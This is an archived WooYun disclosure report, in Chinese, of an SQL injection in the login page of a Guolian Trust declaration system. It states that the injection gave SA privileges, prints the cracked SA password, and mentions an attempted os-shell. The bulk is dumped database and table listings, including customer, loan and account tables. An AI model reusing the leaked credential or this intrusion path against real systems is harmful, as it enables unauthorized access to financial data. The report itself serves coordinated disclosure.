漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0158785
漏洞标题:国联信托股份有限公司某站点sql注入
相关厂商:国联信托股份有限公司
漏洞作者: 大饭刚
提交时间:2015-12-08 01:06
修复时间:2016-01-23 15:16
公开时间:2016-01-23 15:16
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-23: 细节向公众公开
简要描述:
国联信托,国联信托股份有限公司的简称,其前身是无锡市投资信托公司,初创于1987年1月。2003年1月,无锡市信托投资公司获准重新登记,并更名为国联信托投资有限责任公司。
2007年6月,经中国银行监督主管部门批准成为第一批换领新金融牌照的信托公司之一。2007年7月,更名为国联信托有限责任公司。2008年7月,国联信托有限责任公司变更为国联信托股份有限公司。公司目前注册资本为12.3亿元人民币,控股股东为无锡市国联发展(集团)有限公司。2011年末,公司信托总资产224.18亿元。
详细说明:
感觉挺有钱的
站点
http://**.**.**.**/ ===》解析ip:**.**.**.**
扫描端口,发现一个申报系统
http://**.**.**.**:8080/login.jsp
检查发现是登录框有sql注入漏洞
SA权限,所有库如下
sa密码解密得:q1w2e3r4t5~
os-shell报错。发现系统有大量的表,但我就是没去取数据。
就这样吧
漏洞证明:
<code>
Database: EFMOB
[9 tables]
+-----------------------------------------------------------+
| MOB_ATTACHMENTS_TLOGLIST |
| MOB_COPYRIGHT |
| MOB_DEVICES |
| MOB_PROBLEMREADED |
| MOB_TDICTPARAM |
| MOB_TLOGLIST |
| MOB_TOPERATOR |
| TBUSI_TDICTPARAM |
| TOPERATOR_UUID |
+-----------------------------------------------------------+
Database: INTRUSTHistory
[54 tables]
+-----------------------------------------------------------+
| BACKUP_HSUBDETAILYE |
| HASSACTDETAILSUBYE |
| HBENCUSTYE20130428bak |
| HBENCUSTYE20130428bak |
| HBENIFITOR_20110520 |
| HBENIFITOR_20110520 |
| HBENLIST20130428bak |
| HBENLIST20130428bak |
| HBONDERRORINFO |
| HBONDINFO113003 |
| HCASHFLOWS |
| HCOMMCREDIT |
| HCOMMTENANCY |
| HCONFIRMDFDETAIL |
| HCURRENCYRATE |
| HCUSTZJBD_20130329 |
| HCUSTZJBD_20130329 |
| HDATA1 |
| HDATA2 |
| HDEBTDETAIL |
| HDZDATA |
| HEMAILATTACH |
| HEMAILLIST |
| HEMAILRECIPIENTS |
| HFUNDACCT |
| HFUNDMANPRICEINFO |
| HHQINFO |
| HINVEST |
| HLIHIBOR |
| HLOGLIST |
| HLRB |
| HMYMONEYTOTAL |
| HNAVPRICEINFO_SUB |
| HNAVPRICEINFO_SUB |
| HPLSCHEDULE2 |
| HPLSCHEDULE2 |
| HPOSTBH |
| HPRODUCTENDINFO |
| HSQUAREDATA |
| HSTOCKAMOUNT1 |
| HSUBDETAILYE |
| HSUBJECTYE |
| HSUBYE |
| HTASKINFO |
| HTASKLIST |
| HZCFZB6901 |
| HZCFZB6901 |
| TAssActDetailYE_20130107 |
| TAssActDetailYE_20130107 |
| TFUNDACCT_BACKUP |
| TPROBLEMSTATETRANSFER_1 |
| TPROBLEMSTATE_1 |
| TPROJECTS_1 |
| TZLGHHTB |
+-----------------------------------------------------------+
Database: tempdb
[782 tables]
+-----------------------------------------------------------+
| #0038435D |
| #004C869F |
| #00632BE6 |
| #008190C9 |
| #00B69AF3 |
| #00D69684 |
| #010BA0AE |
| #012C6796 |
| #0140AAD8 |
| #0175B502 |
| #01AABF2C |
| #01CABABD |
| #02208BCF |
| #0234CF11 |
| #0269D93B |
| #029EE365 |
| #02BEDEF6 |
| #0314B008 |
| #0328F34A |
| #0334AB99 |
| #035DFD74 |
| #0393079E |
| #0408D441 |
| #041D1783 |
| #0428CFD2 |
| #045221AD |
| #04872BD7 |
| #04DC3192 |
| #04FCF87A |
| #05113BBC |
| #0527E103 |
| #054645E6 |
| #057B5010 |
| #05D055CB |
| #05F11CB3 |
| #06055FF5 |
| #061C053C |
| #066F7449 |
| #068F6FDA |
| #06C47A04 |
| #06E540EC |
| #06F9842E |
| #07053C7D |
| #07102975 |
| #072E8E58 |
| #07639882 |
| #07839413 |
| #07D96525 |
| #07EDA867 |
| #07F960B6 |
| #08044DAE |
| #0822B291 |
| #0857BCBB |
| #0877B84C |
| #08CD895E |
| #08E1CCA0 |
| #08ED84EF |
| #08F871E7 |
| #0916D6CA |
| #094BE0F4 |
| #096BDC85 |
| #09A0E6AF |
| #09D5F0D9 |
| #09E1A928 |
| #09EC9620 |
| #0A0AFB03 |
| #0A40052D |
| #0A6000BE |
| #0A950AE8 |
| #0AB5D1D0 |
| #0ACA1512 |
| #0AD5CD61 |
| #0AE0BA59 |
| #0AF5C8F2 |
| #0AFF1F3C |
| #0B342966 |
| #0BA9F609 |
| #0BBE394B |
| #0BC9F19A |
| #0BF34375 |
| #0C284D9F |
| #0C9E1A42 |
| #0CB25D84 |
| #0CE767AE |
| #0D1C71D8 |
| #0D3C6D69 |
| #0DA681BD |
| #0DB23A0C |
| #0DDB8BE7 |
| #0E109611 |
| #0E3091A2 |
| #0E659BCC |
| #0E8662B4 |
| #0E9AA5F6 |
| #0EA65E45 |
| #0ECFB020 |
| #0F04BA4A |
| #0F59C005 |
| #0F7A86ED |
| #0F8ECA2F |
| #0F9A827E |
| #0FC3D459 |
| #0FF8DE83 |
| #1018DA14 |
| #104DE43E |
| #106EAB26 |
| #1082EE68 |
| #108EA6B7 |
| #10AEA248 |
| #10B7F892 |
| #10ED02BC |
| #110CFE4D |
| #1162CF5F |
| #117712A1 |
| #1182CAF0 |
| #11A2C681 |
| #11AC1CCB |
| #11E126F5 |
| #126B36DA |
| #12A04104 |
| #12D54B2E |
| #132A50E9 |
| #135F5B13 |
| #136B1362 |
| #1394653D |
| #13C96F67 |
| #141E7522 |
| #14537F4C |
| #145F379B |
| #14888976 |
| #14BD93A0 |
| #14DD8F31 |
| #1547A385 |
| #15535BD4 |
| #157CADAF |
| #15B1B7D9 |
| #15D1B36A |
| #163BC7BE |
| #1670D1E8 |
| #16A5DC12 |
| #16C5D7A3 |
| #172FEBF7 |
| #173BA446 |
| #1764F621 |
| #179A004B |
| #17B9FBDC |
| #17EF0606 |
| #18241030 |
| #182FC87F |
| #18591A5A |
| #188E2484 |
| #18AE2015 |
| #18E32A3F |
| #19183469 |
| #194D3E93 |
| #198248BD |
| #19A2444E |
| #19D74E78 |
| #1A0C58A2 |
| #1A1810F1 |
| #1A4162CC |
| #1A766CF6 |
| #1A966887 |
| #1B007CDB |
| #1B358705 |
| #1B6A912F |
| #1B8A8CC0 |
| #1BBF96EA |
| #1BF4A114 |
| #1C005963 |
| #1C29AB3E |
| #1C7EB0F9 |
| #1CE8C54D |
| #1CF47D9C |
| #1D52D9A1 |
| #1DDCE986 |
| #1DE8A1D5 |
| #1E11F3B0 |
| #1E46FDDA |
| #1E66F96B |
| #1ED10DBF |
| #1F0617E9 |
| #1F3B2213 |
| #1F5B1DA4 |
| #1F9027CE |
| #1FC531F8 |
| #202F464C |
| #204F41DD |
| #20844C07 |
| #20B95631 |
| #21236A85 |
| #21436616 |
| #21787040 |
| #21E28494 |
| #22178EBE |
| #22378A4F |
| #226C9479 |
| #22D6A8CD |
| #230BB2F7 |
| #232BAE88 |
| #2360B8B2 |
| #23CACD06 |
| #23FFD730 |
| #241FD2C1 |
| #2454DCEB |
| #24BEF13F |
| #24F3FB69 |
| #2513F6FA |
| #25B31578 |
| #25E81FA2 |
| #26081B33 |
| #263D255D |
| #26722F87 |
| #26A739B1 |
| #26DC43DB |
| #26FC3F6C |
| #27314996 |
| #279B5DEA |
| #27D06814 |
| #27F063A5 |
| #28256DCF |
| #288F8223 |
| #28C48C4D |
| #28E487DE |
| #29199208 |
| #294E9C32 |
| #2983A65C |
| #29B8B086 |
| #29D8AC17 |
| #2A0DB641 |
| #2A6E744B |
| #2A77CA95 |
| #2AACD4BF |
| #2ACCD050 |
| #2B01DA7A |
| #2B629884 |
| #2B6BEECE |
| #2BA0F8F8 |
| #2BF5FEB3 |
| #2C601307 |
| #2C951D31 |
| #2CEA22EC |
| #2D4AE0F6 |
| #2D543740 |
| #2D89416A |
| #2DDE4725 |
| #2E13514F |
| #2E485B79 |
| #2E7D65A3 |
| #2E9D6134 |
| #2F077588 |
| #2F332968 |
| #2F3C7FB2 |
| #2F7189DC |
| #2F91856D |
| #30274DA1 |
| #3065AE15 |
| #3085A9A6 |
| #30BAB3D0 |
| #311B71DA |
| #3159D24E |
| #3179CDDF |
| #31E3E233 |
| #320F9613 |
| #3218EC5D |
| #324DF687 |
| #32A2FC42 |
| #3303BA4C |
| #330D1096 |
| #3323B5DD |
| #33421AC0 |
| #33621651 |
| #3397207B |
| #33F7DE85 |
| #340134CF |
| #3417DA16 |
| #34363EF9 |
| #348B44B4 |
| #34C04EDE |
| #34EC02BE |
| #34F55908 |
| #352A6332 |
| #357F68ED |
| #35B47317 |
| #35E026F7 |
| #35E97D41 |
| #361E876B |
| #363E82FC |
| #36738D26 |
| #36D44B30 |
| #36DDA17A |
| #3712ABA4 |
| #3732A735 |
| #3767B15F |
| #379CBB89 |
| #37C86F69 |
| #37D1C5B3 |
| #37E86AFA |
| #3806CFDD |
| #3846C6FF |
| #385BD598 |
| #3890DFC2 |
| #38BC93A2 |
| #38C5E9EC |
| #38DC8F33 |
| #38FAF416 |
| #391AEFA7 |
| #393AEB38 |
| #394FF9D1 |
| #398503FB |
| #39B0B7DB |
| #39BA0E25 |
| #39D0B36C |
| #39EF184F |
| #3A2F0F71 |
| #3A441E0A |
| #3A792834 |
| #3AA4DC14 |
| #3AAE325E |
| #3AE33C88 |
| #3B2333AA |
| #3B384243 |
| #3B6D4C6D |
| #3B99004D |
| #3BA25697 |
| #3BF75C52 |
| #3C1757E3 |
| #3C6170A6 |
| #3CEB808B |
| #3D0B7C1C |
| #3D208AB5 |
| #3D5594DF |
| #3D6C3A26 |
| #3DFFA055 |
| #3E14AEEE |
| #3E49B918 |
| #3E605E5F |
| #3EB3CD6C |
| #3ED3C8FD |
| #3EF3C48E |
| #3F08D327 |
| #3F3DDD51 |
| #3F548298 |
| #3F898CC2 |
| #3FC7ED36 |
| #3FE7E8C7 |
| #4032018A |
| #405DB56A |
| #407DB0FB |
| #40BC116F |
| #40DC0D00 |
| #412625C3 |
| #4151D9A3 |
| #4171D534 |
| #41B035A8 |
| #41D03139 |
| #421A49FC |
| #4245FDDC |
| #4265F96D |
| #42A459E1 |
| #42C45572 |
| #430E6E35 |
| #433A2215 |
| #435A1DA6 |
| #43987E1A |
| #43B879AB |
| #43CD8844 |
| #4402926E |
| #442E464E |
| #44379C98 |
| #448CA253 |
| #44AC9DE4 |
| #44C1AC7D |
| #44F6B6A7 |
| #45226A87 |
| #452BC0D1 |
| #4580C68C |
| #45A0C21D |
| #45B5D0B6 |
| #46168EC0 |
| #461FE50A |
| #4674EAC5 |
| #4694E656 |
| #46A9F4EF |
| #46DEFF19 |
| #47140943 |
| #4749136D |
| #47690EFE |
| #47890A8F |
| #479E1928 |
| #47D32352 |
| #48082D7C |
| #483D37A6 |
| #487D2EC8 |
| #48923D61 |
| #48FC51B5 |
| #4912F6FC |
| #49315BDF |
| #49715301 |
| #4986619A |
| #49F075EE |
| #4A071B35 |
| #4A258018 |
| #4A65773A |
| #4A7A85D3 |
| #4AE49A27 |
| #4AFB3F6E |
| #4B05610F |
| #4B19A451 |
| #4B599B73 |
| #4BD8BE60 |
| #4BEF63A7 |
| #4BF98548 |
| #4C0DC88A |
| #4C4DBFAC |
| #4C62CE45 |
| #4CCCE299 |
| #4CE387E0 |
| #4CEDA981 |
| #4D01ECC3 |
| #4D41E3E5 |
| #4D56F27E |
| #4DC106D2 |
| #4DE1CDBA |
| #4DF610FC |
| #4E36081E |
| #4E4B16B7 |
| #4EB52B0B |
| #4ED5F1F3 |
| #4EEA3535 |
| #4F2A2C57 |
| #4F3F3AF0 |
| #4FA94F44 |
| #4FDE596E |
| #501E5090 |
| #50335F29 |
| #509D737D |
| #509E3ED4 |
| #50BE3A65 |
| #50D27DA7 |
| #511274C9 |
| #51278362 |
| #519197B6 |
| #5192630D |
| #51A83CFD |
| #51B25E9E |
| #51C6A1E0 |
| #52069902 |
| #521BA79B |
| #5285BBEF |
| #52868746 |
| #529C6136 |
| #52A682D7 |
| #52BAC619 |
| #52FABD3B |
| #530FCBD4 |
| #5344D5FE |
| #535AAFEE |
| #5379E028 |
| #5390856F |
| #539AA710 |
| #53AEEA52 |
| #53EEE174 |
| #5403F00D |
| #5438FA37 |
| #544ED427 |
| #546E0461 |
| #5484A9A8 |
| #548ECB49 |
| #54A30E8B |
| #54E305AD |
| #54F81446 |
| #552D1E70 |
| #5542F860 |
| #5562289A |
| #5578CDE1 |
| #5582EF82 |
| #559732C4 |
| #55D729E6 |
| #56371C99 |
| #56564CD3 |
| #567713BB |
| #568B56FD |
| #56CB4E1F |
| #571566E2 |
| #572B40D2 |
| #574A710C |
| #576B37F4 |
| #577F7B36 |
| #57BF7258 |
| #57D480F1 |
| #58098B1B |
| #581F650B |
| #583E9545 |
| #585F5C2D |
| #58739F6F |
| #58B39691 |
| #58C8A52A |
| #58FDAF54 |
| #59138944 |
| #5932B97E |
| #59495EC5 |
| #5967C3A8 |
| #59A7BACA |
| #59F1D38D |
| #5A07AD7D |
| #5A26DDB7 |
| #5A3D82FE |
| #5A47A49F |
| #5A5BE7E1 |
| #5A9BDF03 |
| #5AE5F7C6 |
| #5AFBD1B6 |
| #5B1B01F0 |
| #5B31A737 |
| #5B500C1A |
| #5B90033C |
| #5BA511D5 |
| #5BDA1BFF |
| #5BEFF5EF |
| #5C0F2629 |
| #5C443053 |
| #5C842775 |
| #5C99360E |
| #5CCE4038 |
| #5CE41A28 |
| #5CE4E57F |
| #5D034A62 |
| #5D24114A |
| #5D38548C |
| #5D784BAE |
| #5D8D5A47 |
| #5DC26471 |
| #5DD83E61 |
| #5DD909B8 |
| #5DF76E9B |
| #5E0E13E2 |
| #5E183583 |
| #5E2C78C5 |
| #5E6C6FE7 |
| #5E817E80 |
| #5EB688AA |
| #5ECC629A |
| #5ECD2DF1 |
| #5EEB92D4 |
| #5F02381B |
| #5F0C59BC |
| #5F209CFE |
| #5F609420 |
| #5F75A2B9 |
| #5FAAACE3 |
| #5FC086D3 |
| #5FC1522A |
| #5FF65C54 |
| #60007DF5 |
| #6014C137 |
| #6054B859 |
| #6069C6F2 |
| #609ED11C |
| #60B57663 |
| #60D3DB46 |
| #60EA808D |
| #60F4A22E |
| #6108E570 |
| #6148DC92 |
| #615DEB2B |
| #6192F555 |
| #61A99A9C |
| #61C7FF7F |
| #61DEA4C6 |
| #61E8C667 |
| #61FD09A9 |
| #623D00CB |
| #62520F64 |
| #6287198E |
| #629DBED5 |
| #62D2C8FF |
| #62DCEAA0 |
| #62F12DE2 |
| #63312504 |
| #6346339D |
| #6391E30E |
| #63D10ED9 |
| #63E5521B |
| #6425493D |
| #643A57D6 |
| #64860747 |
| #64C53312 |
| #64D97654 |
| #65196D76 |
| #652E7C0F |
| #65638639 |
| #657A2B80 |
| #65989063 |
| #65B9574B |
| #65CD9A8D |
| #660D91AF |
| #6622A048 |
| #6657AA72 |
| #666E4FB9 |
| #668CB49C |
| #66AD7B84 |
| #66C1BEC6 |
| #6701B5E8 |
| #6716C481 |
| #674BCEAB |
| #676273F2 |
| #6780D8D5 |
| #67A19FBD |
| #67B5E2FF |
| #67F5DA21 |
| #680AE8BA |
| #683FF2E4 |
| #6856982B |
| #6874FD0E |
| #6895C3F6 |
| #68AA0738 |
| #68E9FE5A |
| #68FF0CF3 |
| #6934171D |
| #694ABC64 |
| #69692147 |
| #6989E82F |
| #699E2B71 |
| #69DE2293 |
| #6A283B56 |
| #6A3EE09D |
| #6A5D4580 |
| #6A924FAA |
| #6AD246CC |
| #6AE75565 |
| #6AF2425D |
| #6B1C5F8F |
| #6B3304D6 |
| #6B5169B9 |
| #6B7230A1 |
| #6B8673E3 |
| #6BC66B05 |
| #6BDB799E |
| #6BE66696 |
| #6C1083C8 |
| #6C6654DA |
| #6C7A981C |
| #6CBA8F3E |
| #6CCF9DD7 |
| #6CDA8ACF |
| #6D04A801 |
| #6D39B22B |
| #6D5A7913 |
| #6D6EBC55 |
| #6DAEB377 |
| #6DCEAF08 |
| #6DF8CC3A |
| #6E0F7181 |
| #6E2DD664 |
| #6E4E9D4C |
| #6E62E08E |
| #6EA2D7B0 |
| #6EECF073 |
| #6F0395BA |
| #6F21FA9D |
| #6F42C185 |
| #6F5704C7 |
| #6F96FBE9 |
| #6FAC0A82 |
| #6FE114AC |
| #6FF7B9F3 |
| #70161ED6 |
| #7036E5BE |
| #704B2900 |
| #7080332A |
| #708B2022 |
| #70A02EBB |
| #70AB1BB3 |
| #70D538E5 |
| #70EBDE2C |
| #710A430F |
| #712B09F7 |
| #713F4D39 |
| #71745763 |
| #717F445B |
| #719452F4 |
| #719F3FEC |
| #71C95D1E |
| #71E00265 |
| #71FE6748 |
| #721F2E30 |
| #72337172 |
| #72687B9C |
| #72736894 |
| #7288772D |
| #72936425 |
| #72BD8157 |
| #72D4269E |
| #72F28B81 |
| #73135269 |
| #732795AB |
| #735C9FD5 |
| #73678CCD |
| #737C9B66 |
| #73B1A590 |
| #73E6AFBA |
| #740776A2 |
| #7450C40E |
| #745BB106 |
| #7470BF9F |
| #74A5C9C9 |
| #74DAD3F3 |
| #750FDE1D |
| #754FD53F |
| #7564E3D8 |
| #75EFBF14 |
| #76040256 |
| #76390C80 |
| #7643F978 |
| #76590811 |
| #768E123B |
| #76AED923 |
| #76C31C65 |
| #76E3E34D |
| #76F8268F |
| #772D30B9 |
| #77381DB1 |
| #774D2C4A |
| #77823674 |
| #77A2FD5C |
| #77B7409E |
| #77D80786 |
| #77EC4AC8 |
| #782154F2 |
| #78415083 |
| #78765AAD |
| #78AB64D7 |
| #78E06F01 |
| #7915792B |
| #79206623 |
| #793574BC |
| #796A7EE6 |
| #7981242D |
| #799F8910 |
| #79D4933A |
| #7A099D64 |
| #7A2998F5 |
| #7A5EA31F |
| #7A754866 |
| #7A93AD49 |
| #7AC8B773 |
| #7AFDC19D |
| #7B1DBD2E |
| #7B52C758 |
| #7B696C9F |
| #7B738E40 |
| #7B87D182 |
| #7BA8986A |
| #7BBCDBAC |
| #7BF1E5D6 |
| #7C11E167 |
| #7C5D90D8 |
| #7C67B279 |
| #7C929B02 |
| #7CB0FFE5 |
| #7CE60A0F |
| #7D0605A0 |
| #7D51B511 |
| #7D5BD6B2 |
| #7D86BF3B |
| #7DA5241E |
| #7DDA2E48 |
| #7DFA29D9 |
| #7E2F3403 |
| #7E45D94A |
| #7E4FFAEB |
| #7E7AE374 |
| #7E994857 |
| #7EEE4E12 |
| #7F23583C |
| #7F441F24 |
| #7F586266 |
| #7F6F07AD |
| #7F8D6C90 |
| #7FC276BA |
| #7FE2724B |
+-----------------------------------------------------------+
Database: EFANS_GL
[176 tables]
+-----------------------------------------------------------+
| ACCOUNT_BALANCE |
| ACCOUNT_INFO |
| ASSET_HISTORY |
| ASSET_INFO |
| ASSET_SUPPORT |
| ASSURE_CONTRACT |
| ASSURE_DETAIL |
| ASSURE_INFO |
| ATTACHMENT_INFO |
| BAIL_INFO |
| BILL_INFO |
| BI_DIMENSIONS |
| BI_OBEJCT |
| CHECK_INTEGRITY |
| CONFIG_CATALOG |
| CONFIG_CATEGORY |
| CONFIG_DATA |
| CONFIG_ELEMENT |
| CONFIG_IMPDIRECT |
| CONFIG_MENU |
| CONFIG_RECORD |
| CONFIG_REGION |
| CONFIG_TASK |
| CONFIG_WORKDAY |
| CONN_INFO |
| CONTRACT_ADDITION |
| CONTRACT_CREDIT |
| CONTRACT_DUEBILL |
| CONTRACT_HISTORY |
| CONTRACT_PUTOUT |
| CONTRACT_REPAYPLAN |
| COST_DEFINITION |
| CUSTOMER_IMPORTANT |
| CUST_CREDIT |
| EXCELIMP_CATALOG |
| EXCELIMP_FIELD |
| EXCEL_DATATEMP |
| FINANCE_REPORT |
| FLOW_CATALOG |
| FLOW_CONTENT |
| FLOW_DRIVEDRAW |
| FLOW_DRIVEDRAW |
| FLOW_NODEDRAW |
| FLOW_NODEDRAW |
| FLOW_OBJECT |
| FLOW_OPINION |
| FLOW_STATE |
| FLOW_TASK |
| FLOW_VIEW |
| FORMPRINT_CATALOG |
| FORMPRINT_DETAIL |
| FUND_RAISE |
| GRADE_INFO |
| INOUT_DETAIL |
| INTEREST_RATEINFO |
| INTERFACE_BUTTON |
| INTERFACE_CATALOG |
| INTERFACE_FIELD |
| INVOICE_INFO |
| ISSUE_SECHDULE |
| ITEM_APPROVE |
| ITEM_CHANGE |
| ITEM_CHECK |
| ITEM_CLASSIFY |
| ITEM_CONTRACT |
| ITEM_DULLPAY |
| ITEM_EXTEND |
| ITEM_FLOWPROCESS |
| ITEM_FUNCHISTORY |
| ITEM_FUNCTION |
| ITEM_INFO_TEST |
| ITEM_INFO_TEST |
| ITEM_PLANHISTORY |
| ITEM_PLANHISTORY |
| ITEM_PROJECT |
| ITEM_REPAY |
| ITEM_RISK |
| KNOWLEDGE_ANSWER |
| LEVEL_APPDATA |
| LEVEL_APPRECORD |
| LEVEL_DRIVE |
| LEVEL_ITEMINDEX |
| LEVEL_TYPE |
| MESSAGE_INFO |
| MODIFY_LOGINFO |
| MYORG_INFO |
| OBJECT_RELATION |
| OBJECT_SCHEDULE |
| PIC_INFO |
| PLAN_INFO |
| PLAN_WEEK |
| POOL_ASSETCHANGE |
| POOL_ASSETCHANGE |
| POOL_ASSETTREAT |
| POOL_HISTORY |
| POOL_INFO |
| POOL_PREPAY |
| POOL_RATECHANGE |
| POOL_REPAYPLAN |
| POOL_STANDARD |
| POST_ACCBALANCE |
| POST_ACCOUNT |
| POST_BALANCE |
| POST_HISTORY |
| POST_LIST |
| POST_SUBBALANCE |
| POST_SUBJECT |
| POST_TRADEDETAIL |
| POST_TRADEDETAIL |
| POST_TYPE |
| POST_WARRANT |
| PRE_ITEM |
| PRODUCT_ACCOUNT |
| PRODUCT_AGNCY |
| PRODUCT_BOOK |
| PRODUCT_CASH_IMPORT |
| PRODUCT_CASH_IMPORT |
| PRODUCT_DATETIME |
| PRODUCT_EVENT |
| PRODUCT_GROUP |
| PRODUCT_HISTORY_IMPORT |
| PRODUCT_HISTORY_IMPORT |
| PRODUCT_HOLDER |
| PRODUCT_INFO |
| PRODUCT_INOUT |
| PRODUCT_ISSUE |
| PRODUCT_LEVEL |
| PRODUCT_MUL |
| PRODUCT_PAYMENT |
| PRODUCT_RECEIVEPAY |
| PRODUCT_REPAY |
| PRODUCT_SETUP |
| PRODUCT_TRADE |
| PRODUCT_TRUST |
| PRODUCT_TYPE |
| PROJECT_INFO |
| RATE_SETTLEMENT |
| REQUIRE_INFO |
| SCHEDULE_CATALOG |
| SCHEDULE_NODE |
| TAATSUBJECT |
| TACCTBOOK |
| TAsstActPostList |
| TBASETAXRATE |
| TBENIFITOR |
| TCASHTYPE |
| TCUSTFINANCEINFO |
| TCUSTFINANCEITEM |
| TCUSTHOLDERS |
| TCUST_CERT |
| TDEPARTMENT |
| TDICTPARAM |
| TEFGMSCONTROL |
| TENTCUSTINFO |
| TENTCWZBINFO |
| TERRORINFO |
| TLOGLIST |
| TOPBOOK |
| TOPERATOR |
| TOPROLE |
| TRADE_INFO |
| TRECORDATTACHMENTS |
| TREPORTINFO |
| TROLE |
| TSYSCONTROL |
| TSYSTEMINFO |
| TUSERINFO |
| TUSETIMES |
| T_REPORT_DATA_T |
| T_REPORT_DATA_T |
| T_REPORT_FIELD |
| VIEW_SHOW_CHECK_INFO |
| WORKINFO_CONFIG |
| WORK_LOG |
| sysdiagrams |
| temp |
+-----------------------------------------------------------+
Database: XXXX
[10 tables]
+-----------------------------------------------------------+
| billexps |
| binvcapitals |
| borrowers |
| colregs |
| loanbills |
| loancontracts |
| loanmoneys |
| loanreturns
修复方案:
过滤好参数。
版权声明:转载请注明来源 大饭刚@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-12-11 16:54
厂商回复:
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
最新状态:
暂无